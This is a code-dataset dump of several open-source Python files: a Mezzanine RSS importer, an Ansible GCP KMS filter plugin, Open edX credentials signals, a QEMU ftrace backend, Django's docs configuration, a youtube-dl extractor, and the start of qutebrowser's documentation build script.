repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
eino-makitalo/mezzanine
|
mezzanine/blog/management/commands/import_rss.py
|
34
|
2878
|
from __future__ import unicode_literals
from datetime import timedelta
from optparse import make_option
from time import timezone
try:
from urllib.request import urlopen
from urllib.parse import urljoin
except ImportError:
from urllib import urlopen
from urlparse import urljoin
from django.core.management.base import CommandError
from mezzanine.blog.management.base import BaseImporterCommand
class Command(BaseImporterCommand):
    """
    Import an RSS feed into the blog app.

    The feed may be given directly via ``--rss-url`` or discovered by
    scraping the ``<link>`` tags of an HTML page given via ``--page-url``.
    Uses the legacy optparse-style management-command interface.
    """

    # Extend the base importer's options with the two feed-source options.
    option_list = BaseImporterCommand.option_list + (
        make_option("-r", "--rss-url", dest="rss_url",
                    help="RSS feed URL"),
        make_option("-p", "--page-url", dest="page_url",
                    help="URL for a web page containing the RSS link"),
    )

    help = ("Import an RSS feed into the blog app. Requires the "
            "dateutil and feedparser packages installed, and also "
            "BeautifulSoup if using the --page-url option.")

    def handle_import(self, options):
        """
        Resolve the feed URL, parse the feed and hand each entry to
        ``self.add_post``.

        Raises ``CommandError`` when neither source option is given or
        when an optional third-party dependency is missing.
        """
        rss_url = options.get("rss_url")
        page_url = options.get("page_url")
        if not (page_url or rss_url):
            raise CommandError("Either --rss-url or --page-url option "
                               "must be specified")
        # Import optional dependencies lazily so we can report exactly
        # which package is missing.
        try:
            from dateutil import parser
        except ImportError:
            raise CommandError("dateutil package is required")
        try:
            from feedparser import parse
        except ImportError:
            raise CommandError("feedparser package is required")
        if not rss_url and page_url:
            # Discover the feed URL by scanning the page's <link> tags.
            if "://" not in page_url:
                # Assume HTTP when no scheme was supplied.
                page_url = "http://%s" % page_url
            try:
                from BeautifulSoup import BeautifulSoup
            except ImportError:
                raise CommandError("BeautifulSoup package is required")
            for l in BeautifulSoup(urlopen(page_url).read()).findAll("link"):
                if ("application/rss" in l.get("type", "") or
                        "application/atom" in l.get("type", "")):
                    rss_url = urljoin(page_url, l["href"])
                    break
            else:
                # for/else: runs only when no feed link was found.
                raise CommandError("Could not parse RSS link from the page")
        posts = parse(rss_url)["entries"]
        for post in posts:
            # Prefer the full content when the feed provides it,
            # falling back to the entry summary.
            if hasattr(post, 'content'):
                content = post.content[0]["value"]
            else:
                content = post.summary
            tags = [tag["term"] for tag in getattr(post, 'tags', [])]
            try:
                # time.timezone is the local offset in seconds west of UTC;
                # subtracting it shifts the parsed date toward UTC.
                # NOTE(review): not DST-aware -- confirm intended behaviour.
                pub_date = parser.parse(getattr(post, "published",
                                                post.updated)) - timedelta(seconds=timezone)
            except AttributeError:
                # Entries with neither "published" nor "updated" get no date.
                pub_date = None
            self.add_post(title=post.title, content=content,
                          pub_date=pub_date, tags=tags, old_url=None)
|
bsd-2-clause
|
Lujeni/ansible
|
lib/ansible/plugins/filter/gcp_kms_filters.py
|
21
|
3679
|
# (c) 2019, Eric Anderson <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Usage:
# vars:
# encrypted_myvar: "{{ var | b64encode | gcp_kms_encrypt(auth_kind='serviceaccount',
# service_account_file='gcp_service_account_file', projects='default',
# key_ring='key_ring', crypto_key='crypto_key') }}"
# decrypted_myvar: "{{ encrypted_myvar | gcp_kms_decrypt(auth_kind='serviceaccount',
# service_account_file=gcp_service_account_file, projects='default',
# key_ring='key_ring', crypto_key='crypto_key') }}"
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.errors import AnsibleError
from ansible.module_utils.gcp_utils import GcpSession
class GcpMockModule(object):
    """Minimal stand-in for an Ansible module object.

    Carries a ``params`` dict and converts ``fail_json`` calls into
    ``AnsibleError`` exceptions so ``GcpSession`` can be driven from a
    Jinja filter instead of a real module.
    """

    def __init__(self, params):
        # Keep the parameter mapping exactly as supplied.
        self.params = params

    def fail_json(self, *args, **kwargs):
        # Surface module-style failures as ordinary Ansible errors.
        message = kwargs['msg']
        raise AnsibleError(message)
class GcpKmsFilter():
    """Implements the gcp_kms_encrypt / gcp_kms_decrypt filter logic."""

    # Every parameter the underlying KMS calls understand.  All default
    # to None except the location, which defaults to 'global'.
    _PARAM_KEYS = (
        'ciphertext', 'plaintext', 'additional_authenticated_data',
        'key_ring', 'crypto_key', 'projects', 'scopes',
        'auth_kind', 'service_account_file', 'service_account_email',
    )

    def run(self, method, **kwargs):
        """Collect call parameters and dispatch to encrypt or decrypt."""
        params = {key: kwargs.get(key, None) for key in self._PARAM_KEYS}
        params['locations'] = kwargs.get('locations', 'global')
        if not params['scopes']:
            # Default to the Cloud KMS OAuth scope.
            params['scopes'] = ['https://www.googleapis.com/auth/cloudkms']
        fake_module = GcpMockModule(params)
        if method == "encrypt":
            return self.kms_encrypt(fake_module)
        elif method == "decrypt":
            return self.kms_decrypt(fake_module)

    def kms_decrypt(self, module):
        """POST to the cryptoKeys :decrypt endpoint; return the plaintext."""
        payload = {"ciphertext": module.params['ciphertext']}
        aad = module.params['additional_authenticated_data']
        if aad:
            payload['additionalAuthenticatedData'] = aad
        auth = GcpSession(module, 'cloudkms')
        url = ("https://cloudkms.googleapis.com/v1/projects/{projects}/locations/{locations}/"
               "keyRings/{key_ring}/cryptoKeys/{crypto_key}:decrypt").format(**module.params)
        response = auth.post(url, body=payload)
        return response.json()['plaintext']

    def kms_encrypt(self, module):
        """POST to the cryptoKeys :encrypt endpoint; return the ciphertext."""
        payload = {"plaintext": module.params['plaintext']}
        aad = module.params['additional_authenticated_data']
        if aad:
            payload['additionalAuthenticatedData'] = aad
        auth = GcpSession(module, 'cloudkms')
        url = ("https://cloudkms.googleapis.com/v1/projects/{projects}/locations/{locations}/"
               "keyRings/{key_ring}/cryptoKeys/{crypto_key}:encrypt").format(**module.params)
        response = auth.post(url, body=payload)
        return response.json()['ciphertext']
def gcp_kms_encrypt(plaintext, **kwargs):
    """Jinja filter entry point: encrypt ``plaintext`` with GCP KMS."""
    kms = GcpKmsFilter()
    return kms.run('encrypt', plaintext=plaintext, **kwargs)
def gcp_kms_decrypt(ciphertext, **kwargs):
    """Jinja filter entry point: decrypt ``ciphertext`` with GCP KMS."""
    kms = GcpKmsFilter()
    return kms.run('decrypt', ciphertext=ciphertext, **kwargs)
class FilterModule(object):
    """Registers the GCP KMS filters with Ansible."""

    def filters(self):
        """Return the filter-name -> callable mapping Ansible expects."""
        mapping = {}
        mapping['gcp_kms_encrypt'] = gcp_kms_encrypt
        mapping['gcp_kms_decrypt'] = gcp_kms_decrypt
        return mapping
|
gpl-3.0
|
ESOedX/edx-platform
|
openedx/core/djangoapps/credentials/signals.py
|
1
|
6507
|
"""
This file contains signal handlers for credentials-related functionality.
"""
from __future__ import absolute_import
from logging import getLogger
from django.contrib.sites.models import Site
from course_modes.models import CourseMode
from lms.djangoapps.certificates.models import CertificateStatuses, GeneratedCertificate
from lms.djangoapps.grades.api import CourseGradeFactory
from openedx.core.djangoapps.catalog.utils import get_programs
from openedx.core.djangoapps.credentials.models import CredentialsApiConfig
from openedx.core.djangoapps.site_configuration import helpers
from .tasks.v1.tasks import send_grade_to_credentials
# Module-level logger for this signals module.
log = getLogger(__name__)

# "interesting" here means "credentials will want to know about it"
INTERESTING_MODES = CourseMode.CERTIFICATE_RELEVANT_MODES
INTERESTING_STATUSES = [
    CertificateStatuses.notpassing,
    CertificateStatuses.downloadable,
]

# These handlers have Credentials business logic that has bled into the LMS. But we want to filter here in order to
# not flood our task queue with a bunch of signals. So we put up with it.
def is_course_run_in_a_program(course_run_key):
    """ Returns true if the given course key is in any program at all. """
    # We don't have an easy way to go from course_run_key to a specific site
    # that owns it, so search every site's program catalog and stop at the
    # first match.
    target = str(course_run_key)
    return any(
        run['key'] == target
        for site in Site.objects.all()
        for program in get_programs(site)
        for course in program['courses']
        for run in course['course_runs']
    )
def send_grade_if_interesting(user, course_run_key, mode, status, letter_grade, percent_grade, verbose=False):
    """
    Checks if grade is interesting to Credentials and schedules a Celery task if so.

    Applies a series of cheap-to-expensive gates (feature flags, cert
    existence, mode/status filters, program membership, grade lookup)
    and returns early as soon as any gate fails; only grades that pass
    every gate are sent to the send_grade_to_credentials task.
    """
    if verbose:
        msg = u"Starting send_grade_if_interesting with params: "\
            u"user [{username}], "\
            u"course_run_key [{key}], "\
            u"mode [{mode}], "\
            u"status [{status}], "\
            u"letter_grade [{letter_grade}], "\
            u"percent_grade [{percent_grade}], "\
            u"verbose [{verbose}]"\
            .format(
                username=getattr(user, 'username', None),
                key=str(course_run_key),
                mode=mode,
                status=status,
                letter_grade=letter_grade,
                percent_grade=percent_grade,
                verbose=verbose
            )
        log.info(msg)
    # Avoid scheduling new tasks if certification is disabled. (Grades are a part of the records/cert story)
    if not CredentialsApiConfig.current().is_learner_issuance_enabled:
        if verbose:
            log.info("Skipping send grade: is_learner_issuance_enabled False")
        return

    # Avoid scheduling new tasks if learner records are disabled for this site.
    if not helpers.get_value_for_org(course_run_key.org, 'ENABLE_LEARNER_RECORDS', True):
        if verbose:
            log.info(
                u"Skipping send grade: ENABLE_LEARNER_RECORDS False for org [{org}]".format(
                    org=course_run_key.org
                )
            )
        return

    # Grab mode/status if we don't have them in hand
    if mode is None or status is None:
        try:
            cert = GeneratedCertificate.objects.get(user=user, course_id=course_run_key)  # pylint: disable=no-member
            mode = cert.mode
            status = cert.status
        except GeneratedCertificate.DoesNotExist:
            # We only care about grades for which there is a certificate.
            if verbose:
                log.info(
                    u"Skipping send grade: no cert for user [{username}] & course_id [{course_id}]".format(
                        username=getattr(user, 'username', None),
                        course_id=str(course_run_key)
                    )
                )
            return

    # Don't worry about whether it's available as well as awarded. Just awarded is good enough to record a verified
    # attempt at a course. We want even the grades that didn't pass the class because Credentials wants to know about
    # those too.
    if mode not in INTERESTING_MODES or status not in INTERESTING_STATUSES:
        if verbose:
            log.info(
                u"Skipping send grade: mode/status uninteresting for mode [{mode}] & status [{status}]".format(
                    mode=mode,
                    status=status
                )
            )
        return

    # If the course isn't in any program, don't bother telling Credentials about it. When Credentials grows support
    # for course records as well as program records, we'll need to open this up.
    if not is_course_run_in_a_program(course_run_key):
        if verbose:
            log.info(
                u"Skipping send grade: course run not in a program. [{course_id}]".format(course_id=str(course_run_key))
            )
        return

    # Grab grades if we don't have them in hand
    if letter_grade is None or percent_grade is None:
        grade = CourseGradeFactory().read(user, course_key=course_run_key, create_if_needed=False)
        if grade is None:
            if verbose:
                log.info(
                    u"Skipping send grade: No grade found for user [{username}] & course_id [{course_id}]".format(
                        username=getattr(user, 'username', None),
                        course_id=str(course_run_key)
                    )
                )
            return
        letter_grade = grade.letter_grade
        percent_grade = grade.percent

    # NOTE(review): third positional argument is hard-coded True --
    # presumably a "verified" flag; confirm against the task signature.
    send_grade_to_credentials.delay(user.username, str(course_run_key), True, letter_grade, percent_grade)
def handle_grade_change(user, course_grade, course_key, **kwargs):
    """
    Notifies the Credentials IDA about certain grades it needs for its records, when a grade changes.
    """
    # Mode and status are unknown at grade-change time; the downstream
    # helper looks them up from the generated certificate.
    verbose = kwargs.get('verbose', False)
    send_grade_if_interesting(
        user, course_key, None, None,
        course_grade.letter_grade, course_grade.percent,
        verbose=verbose,
    )
def handle_cert_change(user, course_key, mode, status, **kwargs):
    """
    Notifies the Credentials IDA about certain grades it needs for its records, when a cert changes.
    """
    # Grades are unknown at cert-change time; the downstream helper
    # reads them from the grade factory.
    verbose = kwargs.get('verbose', False)
    send_grade_if_interesting(user, course_key, mode, status, None, None, verbose=verbose)
|
agpl-3.0
|
krasin/qemu-counter
|
scripts/tracetool/backend/ftrace.py
|
92
|
1500
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Ftrace built-in backend.
"""
__author__ = "Eiichi Tsukata <[email protected]>"
__copyright__ = "Copyright (C) 2013 Hitachi, Ltd."
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "[email protected]"
from tracetool import out
# Presumably marks this backend as selectable from the tracetool command
# line -- TODO confirm against tracetool's backend discovery logic.
PUBLIC = True
def c(events):
    """Generate no C source for the ftrace backend; nothing is required."""
    return None
def h(events):
    """Emit the ftrace header: one inline trace_*() helper per event.

    Each generated helper formats the event into a buffer with snprintf
    and writes it to the ftrace marker fd when the event is enabled.
    """
    # NOTE(review): leading whitespace inside the generated C string
    # literals appears collapsed in this copy of the file -- confirm the
    # intended indentation against the upstream tracetool source.
    out('#include "trace/ftrace.h"',
        '#include "trace/control.h"',
        '',
        )
    for e in events:
        # Argument-name list for the snprintf call; a leading comma is
        # needed whenever the event takes any arguments at all.
        argnames = ", ".join(e.args.names())
        if len(e.args) > 0:
            argnames = ", " + argnames
        out('static inline void trace_%(name)s(%(args)s)',
            '{',
            ' char ftrace_buf[MAX_TRACE_STRLEN];',
            ' int unused __attribute__ ((unused));',
            ' int trlen;',
            ' bool _state = trace_event_get_state(%(event_id)s);',
            ' if (_state) {',
            ' trlen = snprintf(ftrace_buf, MAX_TRACE_STRLEN,',
            ' "%(name)s " %(fmt)s "\\n" %(argnames)s);',
            ' trlen = MIN(trlen, MAX_TRACE_STRLEN - 1);',
            ' unused = write(trace_marker_fd, ftrace_buf, trlen);',
            ' }',
            '}',
            name = e.name,
            args = e.args,
            event_id = "TRACE_" + e.name.upper(),
            fmt = e.fmt.rstrip("\n"),
            argnames = argnames,
            )
|
gpl-2.0
|
dfunckt/django
|
docs/conf.py
|
3
|
12624
|
# -*- coding: utf-8 -*-
#
# Django documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 27 09:06:53 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't picklable (module imports are okay, they're removed automatically).
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import unicode_literals

import sys
from os.path import abspath, dirname, join

# Workaround for sphinx-build recursion limit overflow:
# pickle.dump(doctree, f, pickle.HIGHEST_PROTOCOL)
# RuntimeError: maximum recursion depth exceeded while pickling an object
#
# Python's default allowed recursion depth is 1000 but this isn't enough for
# building docs/ref/settings.txt sometimes.
# https://groups.google.com/d/topic/sphinx-dev/MtRf64eGtv4/discussion
sys.setrecursionlimit(2000)

# Make sure we get the version of this copy of Django
sys.path.insert(1, dirname(dirname(abspath(__file__))))

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(abspath(join(dirname(__file__), "_ext")))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.3'  # Actually 1.3.4, but micro versions aren't supported here.

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
    "djangodocs",
    "sphinx.ext.intersphinx",
    "sphinx.ext.viewcode",
    "ticket_role",
    "cve_role",
]

# Spelling check needs an additional module that is not installed by default.
# Add it only if spelling check is requested so docs can be generated without it.
if 'spelling' in sys.argv:
    extensions.append("sphinxcontrib.spelling")

# Spelling language.
spelling_lang = 'en_US'

# Location of word list.
spelling_word_list_filename = 'spelling_wordlist'

# Add any paths that contain templates here, relative to this directory.
# templates_path = []

# The suffix of source filenames.
source_suffix = '.txt'

# The encoding of source files.
# source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'contents'

# General substitutions.
project = 'Django'
copyright = 'Django Software Foundation and contributors'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.11'
# The full version, including alpha/beta/rc tags.
try:
    from django import VERSION, get_version
except ImportError:
    # Building the docs without Django installed: fall back to X.Y.
    release = version
else:
    def django_release():
        # Append a .dev suffix for pre-alpha checkouts that get_version()
        # does not already mark as a development version.
        pep440ver = get_version()
        if VERSION[3:5] == ('alpha', 0) and 'dev' not in pep440ver:
            return pep440ver + '.dev'
        return pep440ver

    release = django_release()

# The "development version" of Django
django_next_version = '1.11'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None

# Location for .po/.mo translation files used when language is set
locale_dirs = ['locale/']

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'trac'

# Links to Python's docs should reference the most recent version of the 3.x
# branch, which is located at this URL.
intersphinx_mapping = {
    'python': ('https://docs.python.org/3/', None),
    'sphinx': ('http://sphinx-doc.org/', None),
    'six': ('https://pythonhosted.org/six/', None),
    'formtools': ('https://django-formtools.readthedocs.io/en/latest/', None),
    'psycopg2': ('http://initd.org/psycopg/docs/', None),
}

# Python's docs don't change every week.
intersphinx_cache_limit = 90  # days

# The 'versionadded' and 'versionchanged' directives are overridden.
suppress_warnings = ['app.add_directive']

# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "djangodocs"

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["_theme"]

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
html_use_smartypants = True

# Content template for the index page.
# html_index = ''

# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {}

# If false, no module index is generated.
# html_domain_indices = True

# If false, no index is generated.
# html_use_index = True

# If true, the index is split into individual pages for each letter.
# html_split_index = False

# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'Djangodoc'

modindex_common_prefix = ["django."]

# Appended to every page
rst_epilog = """
.. |django-users| replace:: :ref:`django-users <django-users-mailing-list>`
.. |django-core-mentorship| replace:: :ref:`django-core-mentorship <django-core-mentorship-mailing-list>`
.. |django-developers| replace:: :ref:`django-developers <django-developers-mailing-list>`
.. |django-announce| replace:: :ref:`django-announce <django-announce-mailing-list>`
.. |django-updates| replace:: :ref:`django-updates <django-updates-mailing-list>`
"""

# -- Options for LaTeX output --------------------------------------------------

latex_elements = {
    'preamble': (
        '\\DeclareUnicodeCharacter{2264}{\\ensuremath{\\le}}'
        '\\DeclareUnicodeCharacter{2265}{\\ensuremath{\\ge}}'
        '\\DeclareUnicodeCharacter{2665}{[unicode-heart]}'
        '\\DeclareUnicodeCharacter{2713}{[unicode-checkmark]}'
    ),
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
# latex_documents = []
latex_documents = [
    ('contents', 'django.tex', 'Django Documentation',
     'Django Software Foundation', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False

# If true, show page references after internal links.
# latex_show_pagerefs = False

# If true, show URL addresses after external links.
# latex_show_urls = False

# Documents to append as an appendix to all manuals.
# latex_appendices = []

# If false, no module index is generated.
# latex_domain_indices = True

# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(
    'ref/django-admin',
    'django-admin',
    'Utility script for the Django Web framework',
    ['Django Software Foundation'],
    1
), ]

# -- Options for Texinfo output ------------------------------------------------

# List of tuples (startdocname, targetname, title, author, dir_entry,
# description, category, toctree_only)
texinfo_documents = [(
    master_doc, "django", "", "", "Django",
    "Documentation of the Django framework", "Web development", False
)]

# -- Options for Epub output ---------------------------------------------------

# Bibliographic Dublin Core info.
epub_title = project
epub_author = 'Django Software Foundation'
epub_publisher = 'Django Software Foundation'
epub_copyright = copyright

# The basename for the epub file. It defaults to the project name.
# epub_basename = 'Django'

# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
epub_theme = 'djangodocs-epub'

# The language of the text. It defaults to the language option
# or en if the language is not set.
# epub_language = ''

# The scheme of the identifier. Typical schemes are ISBN or URL.
# epub_scheme = ''

# The unique identifier of the text. This can be an ISBN number
# or the project homepage.
# epub_identifier = ''

# A unique identification for the text.
# epub_uid = ''

# A tuple containing the cover image and cover page html template filenames.
epub_cover = ('', 'epub-cover.html')

# A sequence of (type, uri, title) tuples for the guide element of content.opf.
# epub_guide = ()

# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
# epub_pre_files = []

# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
# epub_post_files = []

# A list of files that should not be packed into the epub file.
# epub_exclude_files = []

# The depth of the table of contents in toc.ncx.
# epub_tocdepth = 3

# Allow duplicate toc entries.
# epub_tocdup = True

# Choose between 'default' and 'includehidden'.
# epub_tocscope = 'default'

# Fix unsupported image types using the PIL.
# epub_fix_images = False

# Scale large images.
# epub_max_image_width = 0

# How to display URL addresses: 'footnote', 'no', or 'inline'.
# epub_show_urls = 'inline'

# If false, no index is generated.
# epub_use_index = True

# -- custom extension options --------------------------------------------------

cve_url = 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=%s'
ticket_url = 'https://code.djangoproject.com/ticket/%s'
|
bsd-3-clause
|
vjmac15/Lyilis
|
lib/youtube_dl/extractor/giantbomb (VJ Washington's conflicted copy 2017-08-29).py
|
30
|
2928
|
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..utils import (
determine_ext,
int_or_none,
qualities,
unescapeHTML,
)
class GiantBombIE(InfoExtractor):
    """Extractor for video pages on giantbomb.com."""

    _VALID_URL = r'https?://(?:www\.)?giantbomb\.com/videos/(?P<display_id>[^/]+)/(?P<id>\d+-\d+)'
    _TEST = {
        'url': 'http://www.giantbomb.com/videos/quick-look-destiny-the-dark-below/2300-9782/',
        'md5': 'c8ea694254a59246a42831155dec57ac',
        'info_dict': {
            'id': '2300-9782',
            'display_id': 'quick-look-destiny-the-dark-below',
            'ext': 'mp4',
            'title': 'Quick Look: Destiny: The Dark Below',
            'description': 'md5:0aa3aaf2772a41b91d44c63f30dfad24',
            'duration': 2399,
            'thumbnail': r're:^https?://.*\.jpg$',
        }
    }

    def _real_extract(self, url):
        """Extract metadata and formats from the page's data-video JSON."""
        mobj = re.match(self._VALID_URL, url)
        video_id = mobj.group('id')
        display_id = mobj.group('display_id')

        webpage = self._download_webpage(url, display_id)

        title = self._og_search_title(webpage)
        description = self._og_search_description(webpage)
        thumbnail = self._og_search_thumbnail(webpage)

        # The page embeds stream metadata as HTML-escaped JSON in a
        # data-video attribute.
        video = json.loads(unescapeHTML(self._search_regex(
            r'data-video="([^"]+)"', webpage, 'data-video')))

        duration = int_or_none(video.get('lengthSeconds'))

        # Quality preference, lowest first.
        quality = qualities([
            'f4m_low', 'progressive_low', 'f4m_high',
            'progressive_high', 'f4m_hd', 'progressive_hd'])

        formats = []
        for format_id, video_url in video['videoStreams'].items():
            if format_id == 'f4m_stream':
                continue
            ext = determine_ext(video_url)
            if ext == 'f4m':
                f4m_formats = self._extract_f4m_formats(video_url + '?hdcore=3.3.1', display_id)
                if f4m_formats:
                    # Tag the manifest's formats with this stream's quality.
                    f4m_formats[0]['quality'] = quality(format_id)
                    formats.extend(f4m_formats)
            elif ext == 'm3u8':
                formats.extend(self._extract_m3u8_formats(
                    video_url, display_id, ext='mp4', entry_protocol='m3u8_native',
                    m3u8_id='hls', fatal=False))
            else:
                formats.append({
                    'url': video_url,
                    'format_id': format_id,
                    'quality': quality(format_id),
                })

        # Fall back to the linked YouTube video when no direct streams exist.
        if not formats:
            youtube_id = video.get('youtubeID')
            if youtube_id:
                return self.url_result(youtube_id, 'Youtube')

        # NOTE(review): when formats is still empty here, _sort_formats is
        # presumably expected to raise the "no formats" error -- confirm.
        self._sort_formats(formats)

        return {
            'id': video_id,
            'display_id': display_id,
            'title': title,
            'description': description,
            'thumbnail': thumbnail,
            'duration': duration,
            'formats': formats,
        }
|
gpl-3.0
|
lahwaacz/qutebrowser
|
scripts/asciidoc2html.py
|
1
|
10901
|
#!/usr/bin/env python3
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2017 Florian Bruhin (The Compiler) <[email protected]>
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Generate the html documentation based on the asciidoc files."""
import re
import os
import os.path
import sys
import subprocess
import glob
import shutil
import tempfile
import argparse
import io
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
from scripts import utils
class AsciiDoc:
"""Abstraction of an asciidoc subprocess."""
FILES = [
('FAQ.asciidoc', 'qutebrowser/html/doc/FAQ.html'),
('CHANGELOG.asciidoc', 'qutebrowser/html/doc/CHANGELOG.html'),
('CONTRIBUTING.asciidoc', 'qutebrowser/html/doc/CONTRIBUTING.html'),
('doc/quickstart.asciidoc', 'qutebrowser/html/doc/quickstart.html'),
('doc/userscripts.asciidoc', 'qutebrowser/html/doc/userscripts.html'),
]
def __init__(self, args):
self._cmd = None
self._args = args
self._homedir = None
self._themedir = None
self._tempdir = None
self._failed = False
def prepare(self):
"""Get the asciidoc command and create the homedir to use."""
self._cmd = self._get_asciidoc_cmd()
self._homedir = tempfile.mkdtemp()
self._themedir = os.path.join(
self._homedir, '.asciidoc', 'themes', 'qute')
self._tempdir = os.path.join(self._homedir, 'tmp')
os.makedirs(self._tempdir)
os.makedirs(self._themedir)
def cleanup(self):
"""Clean up the temporary home directory for asciidoc."""
if self._homedir is not None and not self._failed:
shutil.rmtree(self._homedir)
def build(self):
if self._args.website:
self._build_website()
else:
self._build_docs()
self._copy_images()
def _build_docs(self):
"""Render .asciidoc files to .html sites."""
files = self.FILES[:]
for src in glob.glob('doc/help/*.asciidoc'):
name, _ext = os.path.splitext(os.path.basename(src))
dst = 'qutebrowser/html/doc/{}.html'.format(name)
files.append((src, dst))
# patch image links to use local copy
replacements = [
("http://qutebrowser.org/img/cheatsheet-big.png",
"qute://help/img/cheatsheet-big.png"),
("http://qutebrowser.org/img/cheatsheet-small.png",
"qute://help/img/cheatsheet-small.png")
]
for src, dst in files:
src_basename = os.path.basename(src)
modified_src = os.path.join(self._tempdir, src_basename)
with open(modified_src, 'w', encoding='utf-8') as modified_f, \
open(src, 'r', encoding='utf-8') as f:
for line in f:
for orig, repl in replacements:
line = line.replace(orig, repl)
modified_f.write(line)
self.call(modified_src, dst)
def _copy_images(self):
"""Copy image files to qutebrowser/html/doc."""
print("Copying files...")
dst_path = os.path.join('qutebrowser', 'html', 'doc', 'img')
try:
os.mkdir(dst_path)
except FileExistsError:
pass
for filename in ['cheatsheet-big.png', 'cheatsheet-small.png']:
src = os.path.join('doc', 'img', filename)
dst = os.path.join(dst_path, filename)
shutil.copy(src, dst)
def _build_website_file(self, root, filename):
"""Build a single website file."""
# pylint: disable=too-many-locals,too-many-statements
src = os.path.join(root, filename)
src_basename = os.path.basename(src)
parts = [self._args.website[0]]
dirname = os.path.dirname(src)
if dirname:
parts.append(os.path.relpath(os.path.dirname(src)))
parts.append(
os.extsep.join((os.path.splitext(src_basename)[0],
'html')))
dst = os.path.join(*parts)
os.makedirs(os.path.dirname(dst), exist_ok=True)
modified_src = os.path.join(self._tempdir, src_basename)
shutil.copy('www/header.asciidoc', modified_src)
outfp = io.StringIO()
with open(modified_src, 'r', encoding='utf-8') as header_file:
header = header_file.read()
header += "\n\n"
with open(src, 'r', encoding='utf-8') as infp:
outfp.write("\n\n")
hidden = False
found_title = False
title = ""
last_line = ""
for line in infp:
if line.strip() == '// QUTE_WEB_HIDE':
assert not hidden
hidden = True
